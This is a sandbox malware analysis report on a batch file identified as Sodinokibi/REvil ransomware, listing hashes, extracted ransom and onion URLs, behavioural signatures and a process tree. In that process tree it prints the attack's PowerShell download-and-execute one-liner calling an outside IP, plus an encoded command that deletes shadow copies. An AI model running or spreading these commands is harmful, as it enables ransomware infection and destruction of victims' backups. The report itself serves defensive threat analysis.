Analysis
-
max time kernel
107s -
max time network
120s -
platform
windows7_x64 -
resource
win7v200410 -
submitted
22-04-2020 18:10
Static task
static1
Behavioral task
behavioral1
Sample
Me2v4MuS.bat
Resource
win7v200410
Behavioral task
behavioral2
Sample
Me2v4MuS.bat
Resource
win10v200410
General
-
Target
Me2v4MuS.bat
-
Size
197B
-
MD5
9fe4e52640dd89fd2bffd7679d5427c1
-
SHA1
cb782152f0425e231fc8a2e8efa34a0fb13b07a9
-
SHA256
431072d009a13cdfad92609c787cd58680f40d778bb435bf6c6eb29edc7558a0
-
SHA512
f9507bfd78c53ec37cb98e3060f4f88ef6326493cc1dcd7c9248c71005495a3a5e97d0ef27a95ee79c3128ac7993e97483b1d2fbdffbabf627bab9386d7079be
Malware Config
Extracted
http://185.103.242.78/pastes/Me2v4MuS
Extracted
C:\6n56wyp030-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F103D4F6A74E6F10
http://decryptor.cc/F103D4F6A74E6F10
Signatures
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 2040 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 2016 wrote to memory of 2040 2016 cmd.exe powershell.exe PID 2040 wrote to memory of 1412 2040 powershell.exe powershell.exe PID 2040 wrote to memory of 1412 2040 powershell.exe powershell.exe PID 2040 wrote to memory of 1412 2040 powershell.exe powershell.exe PID 2040 wrote to memory of 1412 2040 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2040 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeDebugPrivilege 1412 powershell.exe Token: SeBackupPrivilege 1568 vssvc.exe Token: SeRestorePrivilege 1568 vssvc.exe Token: SeAuditPrivilege 1568 vssvc.exe Token: SeTakeOwnershipPrivilege 2040 powershell.exe -
Drops file in Program Files directory 16 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\ConvertToRestore.ttc powershell.exe File created \??\c:\program files\microsoft sql server compact edition\6n56wyp030-readme.txt powershell.exe File opened for modification \??\c:\program files\UpdateUnpublish.xht powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\6n56wyp030-readme.txt powershell.exe File created \??\c:\program files\6n56wyp030-readme.txt powershell.exe File created \??\c:\program files (x86)\6n56wyp030-readme.txt powershell.exe File opened for modification \??\c:\program files\EnableSync.edrwx powershell.exe File opened for modification \??\c:\program files\SaveRepair.emz powershell.exe File opened for modification \??\c:\program files\SuspendGet.odt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\6n56wyp030-readme.txt powershell.exe File opened for modification \??\c:\program files\CompleteUninstall.dotx powershell.exe File opened for modification \??\c:\program files\DisableUndo.au3 powershell.exe File opened for modification \??\c:\program files\RegisterUnregister.mpg powershell.exe File opened for modification \??\c:\program files\JoinClear.pptm powershell.exe File opened for modification \??\c:\program files\LimitGrant.snd powershell.exe File opened for modification \??\c:\program files\SwitchUnprotect.wm powershell.exe -
Makes http(s) request 1 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 3 http://185.103.242.78/pastes/Me2v4MuS -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 2040 powershell.exe 2040 powershell.exe 2040 powershell.exe 1412 powershell.exe 1412 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 2040 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\740t6949c.bmp" powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Me2v4MuS.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Me2v4MuS');Invoke-BXOVRYVWNFYNYU;Start-Sleep -s 10000"2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
PID:2040 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1412
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1568